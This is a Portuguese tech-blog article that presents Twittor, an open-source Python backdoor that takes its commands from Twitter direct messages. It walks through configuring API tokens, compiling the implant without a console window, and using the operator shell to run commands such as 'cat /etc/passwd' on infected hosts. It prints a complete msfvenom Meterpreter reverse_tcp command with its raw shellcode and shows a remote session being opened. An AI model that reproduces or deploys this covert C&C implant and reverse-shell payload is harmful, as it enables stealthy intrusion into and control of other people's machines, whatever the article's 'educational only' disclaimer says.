Image default
Security

Twittor: um backdoor que utiliza o Twitter como central de C&C

Fonte: devfarm.it

Esta backdoor camuflada baseada em Python que utiliza o Twitter (mensagens diretas) como um servidor de comando e controle (C&C), foi inpirado no GCAT, que utiliza uma conta do Gmail.Para isso você precisará:

  • Uma conta no Twitter (Use uma conta dedicada para isso, não utiiza sua conta pessoal);
  • Registre um aplicativo no Twitter com permissão de leitura e escrita e acesso as mensagens diretas.

Instale as dependências

$ pip install -r requirements.txt
$

Este repositório contém dois arquivos:

twittor.py – é o cliente.

Implant.py – a backdoor que será implantada.

Em ambos os arquivos, edite a parte onde consta o token de acesso e adicione o que foi gerado previstamente quando registrou o aplicativo:

CONSUMER_TOKEN = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
CONSUMER_SECRET = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'

ACCESS_TOKEN = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
ACCESS_TOKEN_SECRET = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'

USERNAME = 'XXXXXXXXXXXXXXXXXXXXXXXX'

Você provavelmente irá compilar o implant.py dentro de um executável utilizando o Pyinstaller a fim de remover o console quando estiver quando estiver compilando com o Pyinstaller, as flags –noconsole –onefile ajudarão nisso.

Como usar

Para executar o client, digite o seguinte:

$ python twittor.py
$

Você entrará em um shell interativo que colocará a sua disposição alguns comandos:

$ help
refresh - atualiza o controle do C&C
list_bots - lista os bots ativos
list_commands - lista comandos executados
!retrieve <jobid> - Recurpera o jobid do comando
!cmd <ENDEREÇO MAC> - executa o comando no bot
!shellcode <ENDEREÇO MAC> - carrega e executa o shellcode na memória (somente em Windows)
help – mostra esta tela de ajudarão
exit – sai do cliente

Caso já tenha implantado o backdoor em vários sistemas, você poderá checar os clientes disponíveis usando o comando:

$ list_bots
B7:76:1F:0B:50:B7: Linux-x.x.x-generic-x86_64-with-Ubuntu-14.04-precise

A saída é o endereço mac, sendo utilizado para identificar unicamente o sistema, mas também lhe dará informações sobre o sistema operacional que está executando o backdoor. Neste caso trata-se da distribuição Linux Ubuntu.

Executando um comando no bot

$ !cmd B7:76:1F:0B:50:B7 cat /etc/passwd
[+] Sent command "cat /etc/passwd" with jobid: UMW07r2

Aqui estamos dizendo ao endereço mac B7:76:1F:0B:50:B7 que execute o comando cat /etc/passwd, o script então, emitirá o jobid UMW07r2, onde poderemos usá-lo para recuperar a saída do comando quando necessário.

Vamos ver os resultados:

$ !retrieve UMW07r2
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
(…)

O comando a ser utilizado neste caso é o !retrieve seguido do jobid do comando.

Recuperando comandos anteriores

Como foi dito anteriormente, os comandos digitados poderão ser recuperados a partir de mensagens diretas mais antigas (o limite é 200) utilizando o comando list_command:

$ list_command
8WNzapM: 'uname -a ' on 2C:4C:84:8C:D3:B1
VBQpojP: 'cat /etc/passwd' on 2C:4C:84:8C:D3:B1
9KaVJf6: 'PING' on 2C:4C:84:8C:D3:B1
aCu8jG9: 'ls -al' on 2C:4C:84:8C:D3:B1
8LRtdvh: 'PING' on 2C:4C:84:8C:D3:B1
$

Executando o shellcode (máquinas Windows)

Esta opção pode ser útil quando se quer recuperar uma sessão do Meterpreter.

Gere o shellcode de seu Meterpreter, algo como:

# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=3615 -f python
(...)
Payload size: 299 bytes
buf = "" buf += "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
buf += "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
buf += "\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
buf += "\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
buf += "\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
buf += "\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
buf += "\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
buf += "\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
buf += "\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
buf += "\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
buf += "\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68"
buf += "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8"
buf += "\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00"
buf += "\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f"
buf += "\xdf\xe0\xff\xd5\x97\x6a\x05\x68\x0a\x00\x00\x01\x68"
buf += "\x02\x00\x0e\x1f\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5"
buf += "\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec"
buf += "\xe8\x3f\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02"
buf += "\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\xe9\x8b\x36\x6a"
buf += "\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53"
buf += "\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9"
buf += "\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\xc3\x01\xc3\x29\xc6"
buf += "\x75\xe9\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5"

Faça a extração do shellcode e envie para um bot específico utilizando o comando !shellcode:

$ !shellcode 11:22:33:44:55 \xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b (...)
[+] Sent shellcode with jobid: xdr7mtN
$

Aqui vamos nós!

msf exploit(handler) > exploit

[*] Started reverse handler on 10.0.0.1:3615
[*] Starting the payload handler...
[*] Sending stage (884270 bytes) to 10.0.0.99
[*] Meterpreter session 1 opened (10.0.0.1:3615 -> 10.0.0.99:49254) at 2015-09-08 10:19:04 -0400

meterpreter > getuid
Server username: WIN-XXXXXXXXX\PaulSec

Quer contribuir ou dar a sua sugestão?

O projeto é totalmente open source e está disponível sobre a licença MIT. A idéia do autor era de criar um PoC após o Twitter ter decidido remover o limite de 140 caracteres para as mensagens diretas. Pouco material deverá ser adicionado como criptografia (AES). O recurso de mensagens diretas utiliza um dicionário de estrutura de dados onde todo o comando é codificado apenas em base64.

O código do Twittor está hospedado no GitHub. Clique na imagem abaixo para fazer o download.

download-button

Altere o projeto, contribua, envie solicitações de mudança e se divirta.

Nota: Este artigo e o código são somente para propósitos educacionais. Não o utilize para outros fins…

Fonte: Hackers Online Club

Posts similares

iPhone X pode ser desbloqueado utilizando uma máscara impressa em 3D

O Analista

Empresa de hacking de telefones sofre ataque

O Analista

Certificado raiz enviado com PCs Dell representa sério risco

O Analista